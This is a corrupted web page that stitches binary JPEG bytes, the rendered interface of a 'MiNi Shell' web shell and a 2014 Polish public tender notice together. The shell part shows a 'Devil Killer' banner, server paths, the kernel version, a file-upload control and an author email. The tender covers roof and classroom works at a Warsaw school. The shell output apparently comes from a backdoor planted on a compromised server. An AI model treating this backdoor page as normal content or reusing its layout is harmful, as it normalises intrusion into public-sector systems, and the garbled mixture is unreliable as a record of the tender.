JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140829/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140829/185161-N-2014.html

<p class="kh_header"><b>Warszawa: Zmiana konstrukcji nachylenia dachu, adaptacja pomieszczeń ostatniej kondygnacji budynku na sale lekcyjne w Zespole Szkół nr 23 przy ul. Górnośląskiej 31 w Warszawie (znak sprawy ZP- 98/14)</b><br>
<b>Numer ogłoszenia: 185161 - 2014; data zamieszczenia: 29.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa Dzielnica Śródmieście , ul. Nowogrodzka 43, 00-691 Warszawa, woj. mazowieckie, tel. 022 6998449, faks 022 6998154.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.srodmiescie.warszawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zmiana konstrukcji nachylenia dachu, adaptacja pomieszczeń ostatniej kondygnacji budynku na sale lekcyjne w Zespole Szkół nr 23 przy ul. Górnośląskiej 31 w Warszawie (znak sprawy ZP- 98/14).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zmiana konstrukcji nachylenia dachu, adaptacja pomieszczeń ostatniej kondygnacji budynku na sale lekcyjne w Zespole Szkół nr 23 przy ul. Górnośląskiej 31  w Warszawie, zgodnie z:
1.	Dokumentacją projektową zawierającą:
1)	Projekt architektoniczno-budowlany (budowlano-wykonawczy) modernizacji szkoły wraz ze zmianą konstrukcji nachylenia dachu poz. 12,40 budynku Zespołu Szkół nr 23 przy ul. Górnośląskiej 31 w Warszawie, wykonany w dniu 23 czerwca 2014 r., przez ARCH-STUDIO Robert Grudziąż, ul. Piotra Skargi 52a, Ząbki. Autorami opracowania są: architektura arch. Robert Grudziąż, konstrukcja mgr inż. Rafał Podstawka.
2)	Projekt wykonawczy remontowanych pomieszczeń szkoły budynku Zespołu Szkół nr 23 przy ul. Górnośląskiej 31 w Warszawie, wykonany w dniu 30 czerwca 2014 r. przez PROel Jan Szerling, ul. Kelles-Krauza 13 lok. U7, Radom. Autorami opracowania są: projektant Jan Szerling, sprawdzający mgr inż. Dariusz Hernik.
3)	Projekt remontu pomieszczeń szkoły instalacje sanitarne w budynku Zespołu Szkół nr 23 przy ul. Górnośląskiej 31 w Warszawie, wykonany w dniu 23 czerwca 20134 r. przez ARCH-STUDIO Robert Grudziąż, ul. Piotra Skargi 52a, Ząbki. Autorem opracowania jest mgr inż. Dariusz Denkiewicz.
4)	Przedmiar robót na modernizację szkoły wraz ze zmianą konstrukcji nachylenia dachu poz. 12,40 budynku Zespołu Szkół nr 23 przy ul. Górnośląskiej 31 w Warszawie, wykonany w dniu 30 lipca 2014 r., przez ARCH-STUDIO Robert Grudziąż, ul. Piotra Skargi 52a, Ząbki. Kalkulację aktualizował Marek Świątecki.
5)	Przedmiar robót na remont pomieszczeń szkoły - branża elektryczna - budynku Zespołu Szkół nr 23 przy ul. Górnośląskiej 31 w Warszawie, aktualizowany przez Arkadiusza Kieresia na podstawie kosztorysu dostarczonego przez firmę PROel Jan Szerling, Radom, ul. Kelles-Krauza 13 lok. U7 w dniu 29 czerwca 2014r.
6)	Przedmiar robót instalacji sanitarnych, wykonany w dniu 21 czerwca 2014r. przez Pawła Goniprowskiego.
2.	Specyfikacją techniczną wykonania i odbioru robót budowlanych modernizacji szkoły wraz ze zmianą konstrukcji nachylenia dachu poz. 12,40 budynku Zespołu Szkół nr 23 przy ul. Górnośląskiej 31 w Warszawie, wykonaną w dniu 23 czerwca 2014 r., przez ARCH-STUDIO Robert Grudziąż, ul. Piotra Skargi 52a, Ząbki. Autorem opracowania jest arch. Robert Grudziąż.
3.	Specyfikacją techniczną wykonania i odbioru robót budowlanych instalacje elektryczne w remontowanych pomieszczeniach budynku Zespołu Szkół nr 23 przy ul. Górnośląskiej 31 w Warszawie, wykonaną w dniu 20 czerwca 2014 r. przez PROel Jan Szerling, ul. Kelles-Krauza 13 lok. U7, Radom. Autorem opracowania jest Jan Szerling.
4.	Specyfikacją techniczną wykonania i odbioru robót budowlanych instalacje sanitarne w budynku Zespołu Szkół nr 23 przy ul. Górnośląskiej 31 w Warszawie, wykonaną w dniu 23 czerwca 2014 r., przez ARCH-STUDIO Robert Grudziąż, ul. Piotra Skargi 52a, Ząbki. Autorem opracowania jest mgr inż. Dariusz Denkiewicz

Ww. opracowania stanowią załącznik nr 7 do SIWZ.

Zamawiający dopuszcza rozwiązania równoważne opisanym w dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót. Wykonawca, który powołuje się na rozwiązania równoważne do opisanych przez Zamawiającego jest obowiązany wykazać, że oferowane przez niego produkty, urządzenia i technologie spełniają wymagania określone przez Zamawiającego. W przypadku zaoferowania innych urządzeń niż określone w SIWZ należy dołączyć do oferty karty katalogowe tych urządzeń.


W zakres zamówienia wchodzi:
-	modernizacja konstrukcji dachu (wymiana na konstrukcję stalową) i wymiana pokrycia dachu;
-	remont polegający na wymianie instalacji elektrycznej poz. 12,40;
-	remont polegający na wymianie instalacji wod.-kan. poz. 12,40;
-	wykonanie instalacji wentylacji poz. 12,40;
-	wymiana tynków, podłóg, posadzek oraz stolarki drzwiowej i okiennej (na aluminiową) i parapetów.
Zestawienie powierzchni:
-	powierzchnia przebudowy ok. 1066 m2 na poz. 12,40;
-	powierzchnia tynków ok. 1400 m2.

Uwaga:
1.	W trakcie prowadzonych robót w obiekcie będą prowadzone zajęcia szkolne.
2.	W robotach tymczasowych, po demontażu istniejącego pokrycia dachowego, należy przewidzieć konieczność wykonania pełnego wyklejenia papą termozgrzewalną, na uprzednio przygotowanym podłożu, stropu ostatniej kondygnacji, wykluczając zalanie pomieszczeń szkolnych.
3.	Należy montować wyposażenie rozdzielnic i osprzętu elektrycznego średniej klasy, rozdzielnice wnękowe o obudowach wykonanych ze stali lub tworzywa odpornego na uderzenia - min. IK-08 drzwi pełne wyposażone w zamek. Urządzenia teletechniczne średniej klasy spełniające wymagania opisane w dokumentacji projektowej.
4.	Wszelkie hałaśliwe i uciążliwe roboty należy wykonać w czasie uzgadnianym z Dyrektorem placówki oświatowej, nie powodując utrudnień w funkcjonowaniu placówki oświatowej.
5.	Przed rozpoczęciem robót wykonawca jest zobowiązany przedłożyć inspektorowi nadzoru pisemną opinię ornitologiczną dotyczącą ochrony ptaków w trakcie prowadzonych robót.

Szczegółowy opis przedmiotu zamówienia zawarty jest w projekcie umowy (załącznik nr 6 do SIWZ).

Przedmiot zamówienia należy wykonać etapami:
I etap - roboty budowlane do kwoty brutto 1.986.034,28 zł w terminie do 10.12.2014 r.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych, stanowiących nie więcej niż 1.200.594,92 zł i polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.42.10.00-4, 45.22.32.00-8, 45.26.25.00-6, 45.26.10.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości  70.000,00 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że posiada doświadczenie zawodowe polegające na wykonaniu w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończonego, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej:
-	jednego zamówienia obejmującego roboty budowlane w branży budowlanej, elektrycznej i sanitarnej, z wyłączeniem robót w lokalach mieszkalnych. Wartość zamówienia - jednej umowy nie może być mniejsza niż 1.500.000,00 zł (brutto)
oraz 
-	jednego zamówienia obejmującego roboty budowlane polegające na wykonaniu więźby w konstrukcji stalowej o powierzchni min. 1000 m2.
W zakresie wykazania spełniania przez Wykonawcę ww. warunku, należy przedłożyć oświadczenie o spełnieniu warunków udziału w postępowaniu (załącznik nr 2 do SIWZ). Ocena spełnienia warunków udziału w postępowaniu dokonana będzie zgodnie z formułą spełnia - nie spełnia na podstawie złożonego przez Wykonawcę oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	pełnomocnictwo, w przypadku gdy Wykonawcę reprezentuje pełnomocnik,
2)	jeżeli Wykonawca, wykazując spełnianie warunków w postępowaniu, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ustawy Prawo zamówień publicznych Zamawiający przewiduje zmiany zawartej umowy dotyczące odpowiednio zmiany wartości zamówienia lub terminu realizacji zamówienia w przypadku zaistnienia jednej z następujących okoliczności:
1)	w razie konieczności podjęcia działań zmierzających do ograniczenia skutków zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć, zagrażającego życiu lub zdrowiu ludzi,
2)	w następstwie wykraczających poza terminy określone w KPA procedur administracyjnych oraz innych terminów formalno-prawnych mających wpływ 
na terminy realizacji zamówienia,
3)	ujawnienia w trakcie robót urządzeń podziemnych, elementów instalacji, konstrukcji, których istnienie lub lokalizacja nie wynika z map uzbrojenia uzgodnionych przez ZUD lub dokumentacji projektowej,
4)	ograniczenia środków budżetowych przeznaczonych na realizację zamówienia,
5)	ustawowych zmian stawki podatku od towarów i usług VAT,
6)	zatwierdzenia wartości kosztorysu powykonawczego, wynikającej ze zwiększonych obmiarów przedstawionych przez Wykonawcę i zaakceptowanych przez Zamawiającego,
7)	zmiany zakresu przedmiotu zamówienia, jeżeli konieczność wprowadzenia takiej zmiany jest skutkiem zmiany przepisów prawa,
8)	ograniczenia przez Zamawiającego zakresu przedmiotu umowy z przyczyn, których nie można było przewidzieć w chwili zawarcia umowy,
9)	zmiany części zamówienia lub zgłoszenia udziału podwykonawcy lub dalszego podwykonawcy,
10)	zmiany podwykonawcy, jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się, w celu wykazania spełniania warunków udziału w  postępowaniu wykonawca jest zobowiązany wykazać zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postepowania o udzielenie zamówienia,
11)	w następstwie zaleceń wynikających z opinii ornitologicznej,
12)	wyjątkowo niesprzyjających warunków pogodowych,
13)	działania siły wyższej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.srodmiescie.warszawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Warszawa, ul. Nowogrodzka 43, pok. nr 308. Opłata za formularz SIWZ  wynosi 100,00 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.09.2014 godzina 10:00, miejsce: Ofertę należy złożyć w siedzibie zamawiającego w Warszawie, ul. Nowogrodzka 43, w Kancelarii Ogólnej.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com